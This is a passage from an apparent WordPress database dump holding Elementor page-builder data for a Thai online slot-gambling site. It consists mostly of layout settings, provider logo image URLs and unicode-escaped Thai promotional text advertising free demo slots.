\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(764,107,'_thumbnail_id','61'),(767,108,'_elementor_edit_mode','builder'),(768,108,'_elementor_template_type','wp-page'),(769,108,'_elementor_version','3.32.5'),(770,108,'_elementor_pro_version','3.32.3'),(771,108,'_wp_page_template','default'),(772,108,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(773,108,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 